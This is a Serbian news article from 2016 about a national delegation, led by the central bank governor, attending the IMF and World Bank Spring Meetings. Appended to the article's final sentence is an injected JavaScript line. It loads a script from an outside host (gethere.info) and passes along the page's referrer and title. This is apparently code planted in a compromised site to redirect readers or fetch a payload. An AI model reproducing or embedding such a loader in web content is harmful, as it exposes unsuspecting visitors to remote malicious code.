Vesti
13.04.2016. 08:36
ekspres

Delegacija Srbije na Prolećnom zasedanju MMF i SB

Ekspres.net
Izvor: Ekspres.net

BEOGRAD, 13. aprila  - Delegacija Srbije koju predvodi guverner Narodne banke Srbije i guverner Srbije u Međunarodnom monetarnom fondu Jorgovanka Tabaković, a čine je predstavnici Ministarstva finansija i NBS, prisustvovaće Prolećnom zasedanju MMF i Grupacije Svetske banke u Vašingtonu. Delegacija će na sastancima sa predstavnicima MMF-a predstaviti dosadašnje rezultate u sprovođenju fiskalne konsolidacije, kao i realizaciju mera monetarne i finansijske politike u okviru dogovorenog ekonomskog programa, koji je podržan aktuelnim stendbaj aranžmanom.Planirani su sastanci sa predstavnicima Grupacije Svetske banke radi razmatranja saradnje u vezi sa aktuelnim programom - Strateški okvir za partnerstvo za Republiku Srbiju.

Ekspres.net
Izvor: Ekspres.netEkspres.net

Pored navedenog, Prolećno zasedanje će, takođe, biti prilika za niz bilateralnih susreta predstavnika delegacije Srbije sa investitorima, agencijama za kreditni rejting, globalnim poslovnim bankama i međunarodnim finansijskim institucijama.

Prolećno zasedanje MMF-a i Grupacije Svetske banke održava se od 12. do 17. aprila. Tom prilikom biće održani sastanci Međunarodnog monetarnog i finansijskog komiteta i Zajedničkog komiteta za razvoj, savetodavnih organa ovih institucija.Na sastancima savetodavnih komiteta biće razmatrana pitanja koja se odnose na međunarodni monetarni sistem, usporavanje privrednog rasta u zemljama u razvoju, migracije, globalne rizike, i iznalaženje mera kojima bi se obezbedio stabilan monetarni sistem u svetu i time podstakao održivi razvoj.

Ekspres.net
Izvor: Ekspres.netEkspres.net
Tokom Prolećnog zasedanja biće sumirani rezultati sprovođenja reforme kvota i upravljanja u Međunarodnom monetarnom fondu, koja je stupila na snagu 26. januara 2016. Realizacija ove reforme treba da obezbedi jačanje legitimiteta i efikasnosti ove institucije.
Takođe, Svetska banka preduzima mere u cilju reforme načina predstavljanja zemalja članica, i s tim u vezi prezentovaće napredak koji je ostvaren.

Inače, Međunarodni monetarni fond je dobio novu državu članicu - Republiku Nauru, pa sada ta institucija ima 189 zemalja članica, saopšteno je iz MMF-a.s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
26°C
16.04.2024.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve